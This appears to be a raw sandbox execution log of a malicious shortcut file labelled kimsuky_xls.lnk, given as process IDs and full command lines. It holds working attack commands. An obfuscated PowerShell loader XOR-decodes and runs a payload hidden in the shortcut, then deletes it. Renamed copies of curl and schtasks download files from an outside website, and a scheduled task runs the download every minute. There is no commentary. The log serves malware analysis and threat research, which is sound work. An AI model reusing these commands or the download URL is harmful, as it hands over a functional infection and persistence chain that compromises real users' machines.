cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "LdbpXYQsMFg" C:\Users\test22\AppData\Local\Temp\kimsuky_xls.lnk
3068cmd.exe "C:\Windows\system32\cmd.exe" /c for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$trans=0;<#App-Poisoning#>$boost='length';<#App-Poisoning#>$export=Get-Location;$herself=&(gcm *et-Child*) *.lnk;<#App-Poisoning#>$herself=$herself|where-object{$_.$boost -eq 0x00007D45};<#App-Poisoning#>$theater=$herself;<#App-Poisoning#>$herself=$herself|Select-Object -ExpandProperty Name;<#App-Poisoning#>if([string]::IsNullOrEmpty($herself)){$trans=1;<#App-Poisoning#>$export=$env:USERPROFILE;<#App-Poisoning#>$export=$export+'\appdata\local\temp';<#App-Poisoning#>$herself=Get-ChildItem -Path $export -Recurse -Filter *.lnk|where-object{$_.$boost -eq 0x00007D45}|ForEach-Object{$_.FullName}|Select-Object -First 1;<#App-Poisoning#>$theater=$herself};<#App-Poisoning#>$finding=$herself.substring(0,$herself.length-4);$awesome=[System.IO.BinaryReader]::new([System.IO.File]::open($herself,[System.IO.FileMode]::Open,[System.IO.FileAccess]::Read,[System.IO.FileShare]::Read));try{$awesome.BaseStream.Seek(0x0000183E,[System.IO.SeekOrigin]::Begin);$rescueeyboard=$awesome.ReadBytes(0x00003C12);}finally{$awesome.Close()};$rescue=0;$styles=0;$firms=$rescueeyboard.count;while ($rescue -lt $firms){$sizes=0x01;$styles=$rescue-[math]::Floor($rescue/$sizes)*$sizes;$spending=0xFE+$styles;$rescueeyboard[$rescue]=$rescueeyboard[$rescue] -bxor $spending;$rescue++};[System.IO.File]::WriteAllBytes($finding,$rescueeyboard);if($trans -eq 1){$entire=$finding}else{$entire='.\'+$finding};& $entire;remove-item -path $theater -force;"&zZHDQoKxCqATBpeFafs||cd /d c:\Users\Public\Documents & copy c:\windows\system32\curl.exe cXAzWSe.exe & copy c:\windows\system32\schtasks.exe cXAzWSe1.exe & cXAzWSe -k -o ABBLIbd.exe https://www.holosformations.fr/wp-admin/js/widgets/hurryup/?rv=bear^&za=battle0 & cXAzWSe -k -o qaVnopX.cdr https://www.holosformations.fr/wp-admin/js/widgets/hurryup/?rv=bear^&za=battle1 & cXAzWSe1 /delete /tn "qaVnopX" /f & cXAzWSe1 /create /sc minute /mo 1 /tn "qaVnopX" /tr "c:\Users\Public\Documents\ABBLIbd.exe c:\Users\Public\Documents\qaVnopX.cdr"
2224cmd.exe C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
2352powershell.exe C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$trans=0;<#App-Poisoning#>$boost='length';<#App-Poisoning#>$export=Get-Location;$herself=&(gcm *et-Child*) *.lnk;<#App-Poisoning#>$herself=$herself|where-object{$_.$boost -eq 0x00007D45};<#App-Poisoning#>$theater=$herself;<#App-Poisoning#>$herself=$herself|Select-Object -ExpandProperty Name;<#App-Poisoning#>if([string]::IsNullOrEmpty($herself)){$trans=1;<#App-Poisoning#>$export=$env:USERPROFILE;<#App-Poisoning#>$export=$export+'\appdata\local\temp';<#App-Poisoning#>$herself=Get-ChildItem -Path $export -Recurse -Filter *.lnk|where-object{$_.$boost -eq 0x00007D45}|ForEach-Object{$_.FullName}|Select-Object -First 1;<#App-Poisoning#>$theater=$herself};<#App-Poisoning#>$finding=$herself.substring(0,$herself.length-4);$awesome=[System.IO.BinaryReader]::new([System.IO.File]::open($herself,[System.IO.FileMode]::Open,[System.IO.FileAccess]::Read,[System.IO.FileShare]::Read));try{$awesome.BaseStream.Seek(0x0000183E,[System.IO.SeekOrigin]::Begin);$rescueeyboard=$awesome.ReadBytes(0x00003C12);}finally{$awesome.Close()};$rescue=0;$styles=0;$firms=$rescueeyboard.count;while ($rescue -lt $firms){$sizes=0x01;$styles=$rescue-[math]::Floor($rescue/$sizes)*$sizes;$spending=0xFE+$styles;$rescueeyboard[$rescue]=$rescueeyboard[$rescue] -bxor $spending;$rescue++};[System.IO.File]::WriteAllBytes($finding,$rescueeyboard);if($trans -eq 1){$entire=$finding}else{$entire='.\'+$finding};& $entire;remove-item -path $theater -force;"
2420cXAzWSe1.exe cXAzWSe1 /delete /tn "qaVnopX" /f
2244cXAzWSe1.exe cXAzWSe1 /create /sc minute /mo 1 /tn "qaVnopX" /tr "c:\Users\Public\Documents\ABBLIbd.exe c:\Users\Public\Documents\qaVnopX.cdr"
2532